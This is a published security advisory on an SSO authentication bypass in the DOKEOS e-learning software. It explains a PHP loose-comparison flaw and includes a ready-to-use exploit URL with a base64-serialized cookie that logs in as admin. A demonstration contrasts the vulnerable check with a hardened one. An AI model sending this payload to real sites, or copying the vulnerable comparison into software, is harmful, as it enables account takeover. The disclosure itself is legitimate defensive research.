SSO Authentication Bypass and Website Takeover in DOKEOS

Advisory ID: HTB23289
Vulnerable Versions: ce30 and probably prior
Tested Version: ce30
Advisory Publication: January 7, 2016 [without technical details]
Vendor Notification: January 7, 2016
Public Disclosure: February 17, 2016
Vulnerability Type: Improper Authentication [CWE-287]
CVE Reference: Pending
Risk Level: High
CVSSv2 Base Score: 7.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in DOKEOS, a popular e-learning software. A remote unauthenticated attacker can bypass the authentication process and log in to the vulnerable website as an arbitrary user (including the administrator). Successful exploitation requires Single Sign-On (SSO) authentication to be enabled.

The vulnerability is caused by a variable type confusion error when a password hash is compared to an unserialized value during the authentication process, when SSO authentication is enabled (sso_authentication=true). In this case, the application takes the base64-encoded login and password from the HTTP GET "sso_cookie" parameter and then calls the 'unserialize()' PHP function on the received data.

Below is an example of the vulnerable code, which erroneously uses the loose "==" operator to compare the two values (instead of the strict "===" operator):
if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] == $uData['username'])) {

In this case, the SHA1 password hash is compared to the $sso['secret'] value, which is controlled by the attacker. If the attacker passes the Boolean true instead of the real password, the loose comparison succeeds and the attacker bypasses authentication and logs in under an arbitrary web application account.

A simple exploit below can be used to authenticate under the "admin" account:
http://[host]/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=

The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=" string is translated from base64 into:
a:2:{s:8:"username";s:5:"admin";s:6:"secret";b:1;}

After the execution of 'unserialize()' function, we have the following array:
$sso['username'] = 'admin';
$sso['secret'] = true;
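The following is an added example, not DOKEOS code: it reproduces the loose comparison from the advisory against a constructed user record and the advisory's forged cookie, and places a hardened check beside it. The user record, the legitimate cookie, and the function names vulnerableCheck and hardenedCheck are assumptions made for this demonstration.

```php
<?php
// Added example (not DOKEOS code). The user record and legitimate cookie are constructed.
$uData = ['username' => 'admin', 'password' => 'stored-password-value'];

// Legitimate cookie: secret is the SHA1 of the stored password value.
$legit = base64_encode(serialize(['username' => 'admin', 'secret' => sha1($uData['password'])]));
// Forged cookie from the advisory: secret is boolean true, no password knowledge needed.
$forged = 'YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=';

// Vulnerable check (mirrors the advisory): unserialize() lets the client choose the
// type of $sso['secret'], and "==" coerces the non-empty hash string to boolean true,
// so b:1 compares equal to any SHA1 hash.
function vulnerableCheck(string $cookie, array $uData): bool
{
    $sso = unserialize(base64_decode($cookie));
    return $sso['secret'] == sha1($uData['password']) && ($sso['username'] == $uData['username']);
}

// Hardened check: strict base64 decoding, no object instantiation from unserialize(),
// string-typed fields only, and hash_equals() for a type-strict, constant-time compare.
function hardenedCheck(string $cookie, array $uData): bool
{
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return false;
    }
    $sso = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($sso) || !isset($sso['username'], $sso['secret'])
        || !is_string($sso['username']) || !is_string($sso['secret'])) {
        return false;
    }
    return hash_equals($uData['username'], $sso['username'])
        && hash_equals(sha1($uData['password']), $sso['secret']);
}

var_dump(vulnerableCheck($legit, $uData));
var_dump(vulnerableCheck($forged, $uData));
var_dump(hardenedCheck($legit, $uData));
var_dump(hardenedCheck($forged, $uData));
```

vulnerableCheck accepts both cookies, while hardenedCheck accepts only the legitimate one, because a boolean secret fails the is_string() test before any comparison takes place.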

Disclosure timeline:
2016-01-07 Vendor notified via contact form, no reply.
2016-01-13 Vendor notified via contact form, emails and twitter, no reply.
2016-01-20 Vendor notified via contact form and emails, no reply.
2016-01-27 Fix Requested via contact form and emails, no reply.
2016-02-03 Fix Requested via contact form and emails, no reply.
2016-02-17 Public disclosure.

Currently we are not aware of any official solution for this vulnerability.

Related Security Advisories: HTB23181: SQL Injection in Dokeos
